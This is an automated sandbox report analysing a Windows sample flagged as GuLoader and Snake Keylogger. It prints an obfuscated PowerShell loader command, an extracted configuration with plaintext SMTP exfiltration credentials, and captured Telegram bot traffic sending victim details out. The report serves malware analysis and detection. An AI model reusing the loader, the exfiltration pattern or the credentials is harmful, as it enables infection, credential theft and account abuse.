Windows Analysis Report
NDQ211216GM08.exe.bin.exe

Overview

General Information

Sample name:NDQ211216GM08.exe.bin.exe
Analysis ID:1637274
MD5:cfdb222e894ea0d5fe9557aae2e0adf3
SHA1:cc01954d759cce12e827be5b1443d5702ebc779d
SHA256:d7798f6bb9a86bb1f5c9d5633015951425439cad729cc2411ff092ae654620be
Tags:exe, user-TornadoAV_dev

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • NDQ211216GM08.exe.bin.exe (PID: 6348 cmdline: "C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe" MD5: CFDB222E894EA0D5FE9557AAE2E0ADF3)
    • powershell.exe (PID: 6456 cmdline: "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Nonalined.exe (PID: 5156 cmdline: "C:\Users\user\AppData\Local\Temp\Nonalined.exe" MD5: CFDB222E894EA0D5FE9557AAE2E0ADF3)
  • svchost.exe (PID: 2540 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "vicente@bodegasvicenteribera.es", "Password": "Vic123456**", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000001.00000002.1434300899.000000000A131000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: Nonalined.exe PID: 5156 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Nonalined.exe PID: 5156 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

System Summary

Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)", CommandLine: "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe", ParentImage: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe, ParentProcessId: 6348, ParentProcessName: NDQ211216GM08.exe.bin.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)", ProcessId: 6456, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2540, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-13T13:34:40.092454+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49698 | 104.21.80.1 | 443 | TCP
2025-03-13T13:34:35.136983+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49695 | 193.122.130.0 | 80 | TCP
2025-03-13T13:34:37.554267+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49695 | 193.122.130.0 | 80 | TCP
2025-03-13T13:34:40.601127+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49699 | 193.122.130.0 | 80 | TCP
2025-03-13T13:34:28.277829+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49693 | 142.250.74.206 | 443 | TCP
2025-03-13T13:35:03.517398+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.9 | 49713 | 149.154.167.220 | 443 | TCP

AV Detection

Source: NDQ211216GM08.exe.bin.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Avira: detection malicious, Label: TR/Injector.wdfal
Source: 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "vicente@bodegasvicenteribera.es", "Password": "Vic123456**", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Virustotal: Detection: 63%
Source: NDQ211216GM08.exe.bin.exe | Virustotal: Detection: 63%
Source: NDQ211216GM08.exe.bin.exe | ReversingLabs: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_234187A8 CryptUnprotectData | 11_2_234187A8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_23418EF1 CryptUnprotectData | 11_2_23418EF1
Source: NDQ211216GM08.exe.bin.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49696 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 142.250.74.206:443 -> 192.168.2.9:49693 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.9:49694 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49713 version: TLS 1.2
Source: NDQ211216GM08.exe.bin.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 0_2_00405C13
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | Code function: 0_2_0040683D FindFirstFileW,FindClose | 0_2_0040683D
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | Code function: 0_2_0040290B FindFirstFileW | 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_0040290B FindFirstFileW | 11_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 11_2_00405C13
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_0040683D FindFirstFileW,FindClose | 11_2_0040683D
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 0015F45Dh | 11_2_0015F2C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 0015F45Dh | 11_2_0015F4AC
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 0015FC19h | 11_2_0015F974
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 22413308h | 11_2_22412EF0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 22412D41h | 11_2_22412A90
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2241EA79h | 11_2_2241E7D0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2241D919h | 11_2_2241D670
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2241D4C1h | 11_2_2241D218
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 22413308h | 11_2_22413236
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2241DD71h | 11_2_2241DAC8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 22413308h | 11_2_22412EEA
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2241E621h | 11_2_2241E378
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2241E1C9h | 11_2_2241DF20
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 22410D0Dh | 11_2_22410B30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 224116F8h | 11_2_22410B30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 11_2_22410040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2241EED1h | 11_2_2241EC28
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2241F781h | 11_2_2241F4D8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2241F329h | 11_2_2241F080
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2241FBD9h | 11_2_2241F930
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2241D069h | 11_2_2241CDC0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23417EB5h | 11_2_23417B78
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23419280h | 11_2_23418FB0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341DEFFh | 11_2_2341DC30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23415179h | 11_2_23414ED0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23410FF1h | 11_2_23410D48
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341E81Fh | 11_2_2341E550
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23412A01h | 11_2_23412758
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341C82Fh | 11_2_2341C560
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341A83Fh | 11_2_2341A570
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234125A9h | 11_2_23412300
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341F5CFh | 11_2_2341F300
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341D5DFh | 11_2_2341D310
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234179C9h | 11_2_23417720
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341B5EFh | 11_2_2341B320
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234155D1h | 11_2_23415328
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23419A8Fh | 11_2_234197C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23415E81h | 11_2_23415BD8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341ECAFh | 11_2_2341E9E0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341CCBFh | 11_2_2341C9F0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234118A1h | 11_2_234115F8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23415A29h | 11_2_23415780
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341FA5Fh | 11_2_2341F790
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341DA6Fh | 11_2_2341D7A0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23411449h | 11_2_234111A0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341BA7Fh | 11_2_2341B7B0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23412E59h | 11_2_23412BB0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234102E9h | 11_2_23410040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341BF0Fh | 11_2_2341BC40
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23411CF9h | 11_2_23411A50
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23419F1Fh | 11_2_23419C50
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23413709h | 11_2_23413460
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23417119h | 11_2_23416E70
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341F13Fh | 11_2_2341EE70
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23414D21h | 11_2_23414A78
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341ACCFh | 11_2_2341AA00
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234132B1h | 11_2_23413008
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23416CC1h | 11_2_23416A18
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234148C9h | 11_2_23414620
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234162D9h | 11_2_23416030
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341E38Fh | 11_2_2341E0C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23417571h | 11_2_234172C8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341C39Fh | 11_2_2341C0D0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341A3AFh | 11_2_2341A0E0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23410B99h | 11_2_234108F0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341D14Fh | 11_2_2341CE80
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23416733h | 11_2_23416488
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2341B15Fh | 11_2_2341AE90
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23410741h | 11_2_23410498
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23412151h | 11_2_23411EA8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234847E8h | 11_2_23484478
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23489B10h | 11_2_23489818
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348F5E8h | 11_2_2348F2F0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23484E90h | 11_2_23484B98
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23481517h | 11_2_23481248
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23486B40h | 11_2_23486848
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234802E7h | 11_2_23480040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348D938h | 11_2_2348D640
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23483E27h | 11_2_23483B58
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348C150h | 11_2_2348BE58
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23489648h | 11_2_23489350
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23481E37h | 11_2_23481B68
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23487E60h | 11_2_23487B68
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23485358h | 11_2_23485060
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348EC59h | 11_2_2348E960
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348D470h | 11_2_2348D178
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348A968h | 11_2_2348A670
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348DE00h | 11_2_2348DB08
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348B2F8h | 11_2_2348B000
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23482BE7h | 11_2_23482918
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23487008h | 11_2_23486D10
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23480BF7h | 11_2_23480928
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23485820h | 11_2_23485528
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348F120h | 11_2_2348EE28
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348C618h | 11_2_2348C320
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23483507h | 11_2_23483238
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348AE30h | 11_2_2348AB38
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23488328h | 11_2_23488030
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23483997h | 11_2_234836C8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348B7C0h | 11_2_2348B4C8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23488CB8h | 11_2_234889C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234819A7h | 11_2_234816D8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234874D0h | 11_2_234871D8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348E2C8h | 11_2_2348DFD0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234842B7h | 11_2_23483FE8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348CAE0h | 11_2_2348C7E8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23489FD8h | 11_2_23489CE0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234822C7h | 11_2_23481FF8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234887F0h | 11_2_234884F8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23485CE8h | 11_2_234859F0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23482757h | 11_2_23482488
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23489180h | 11_2_23488E88
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23486678h | 11_2_23486380
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23480767h | 11_2_23480498
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348E790h | 11_2_2348E498
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348BC88h | 11_2_2348B990
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23483078h | 11_2_23482DA8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348A4A0h | 11_2_2348A1A8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23487998h | 11_2_234876A0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 23481087h | 11_2_23480DB8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234861B0h | 11_2_23485EB8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348FAB0h | 11_2_2348F7B8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 2348CFA8h | 11_2_2348CCB0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 11_2_234AF1CB
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 11_2_234AF1C7
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 11_2_234AF1BF
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 11_2_234AF1BD
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 11_2_234AF228
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234B0800h | 11_2_234B0508
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then jmp 234B0338h | 11_2_234B0040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 11_2_234E2A80

          Networking

          barindex
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49713 -> 149.154.167.220:443
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2014/03/2025%20/%2011:48:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
          Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
          Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49699 -> 193.122.130.0:80
